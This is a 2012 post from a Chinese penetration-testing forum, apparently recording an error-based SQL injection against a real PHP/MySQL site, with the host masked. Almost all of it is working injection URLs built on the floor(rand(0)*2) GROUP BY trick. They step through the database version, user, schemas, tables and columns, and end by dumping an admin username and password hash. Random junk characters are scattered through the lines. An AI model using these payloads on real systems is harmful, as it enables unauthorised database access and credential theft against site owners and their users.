找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
返回列表 发新帖
查看: 2409|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-016667 ~0 o5 a/ y2 N- y) P) r
) B9 E( P! }, p# t8 D
之前想找个测试 没想到这有 可以测试下做个记录而已 ) ?9 s6 \( G9 d

+ B( I3 Z' Y. R' i$ }1 khttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
3 y, U2 D1 b& E1 A' Y7 W: J# p+ |) d  q2 \( {2 G% C
/data0/htdocs/leqi_new/app/myapp.php
7 H2 M9 C# k0 W& ~' F0 v( ]2 y  G4 c6 e0 D( Y( j! y6 n
或者0 g3 T% v4 x2 W
+ g0 l& s) y- u5 K' z, L" m
/**********version()**********/ 5.1.49-log5 |$ u( O1 p) n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& _3 e1 [  L! i5 |4 Y% x4 k9 U. t+ M9 g; w8 x3 ~0 b. e
/**********user()**********/  4 r3 x* e# c) \/ e# `6 j: X& r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- p  w+ _* x# y% V
: a, D% n3 L, q9 l* ~2 q3 V. D; \
/**********database()**********/  leqi
  r9 c! Y) f: B, t5 |( [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ I/ t9 @4 [7 @. I9 N4 I" r/ Y) G2 Y0 P3 _3 z/ t" Q
/**********limit依次递归爆库**********/
+ |( \1 R' \! _0 z# Q/ H# y0 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ `+ X- r5 d0 [  d) v; p
information_schema( `5 F- ~% M$ o0 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& g- a1 y' ]0 a5 Q0 i; k
leqi
/ N8 g% ]% Z. Y+ ]3 ~3 s# l) s# Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 K  V) _; U. R! e$ ]
test
$ X0 b2 |. c6 \  R
. V) K$ Z0 Y: u  s: u/**********limit依次递归爆表名**********/
- n$ {! x, g% [* phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! ~1 a6 ?: U/ k1 O) l/ J
users
. [/ D0 |$ O( M
; a6 o4 |; R; _/**********limit依次递归爆字段名**********/5 w! i$ \  I$ \0 R( `1 p5 z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 s; U9 ?/ m5 z$ u
user_id,username,nickname,passwd,group_id: O% M2 n4 K3 u# f9 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 j( g, H2 T5 f* T/wapc/5000_0005_003
& ?! e' M  P- ~5 b: G: e11 21
) z5 e5 ?% t8 H) U8 c) w! ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 f8 i5 e5 f- L! ]4 @9 l: N+ R
/wapc/5000_0005_003& x( O5 a5 u; U# V1 f+ Y/ Q
11 341 351 361
) c: k) w6 u0 O1 u: D* M7 b$ |! D/**********爆数据**********/  ^; z5 P1 x; R0 [$ ~; \) \$ h8 ~- p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
$ s7 v; j+ H% ?4 Iadmin% d9 ]# v8 X4 E. q0 W) R) I( A0 f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
7 _6 r# M# b, x2 L. A6a8b4574ca231eb8bd52764d4978ffcd
; T$ j/ i; f6 X  B% t. a# W3 [+ l/ T
' D4 u( \! X" X7 A# ]" u! _6 `( O! @ * x8 K* ]7 W( a5 T$ b, W  e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表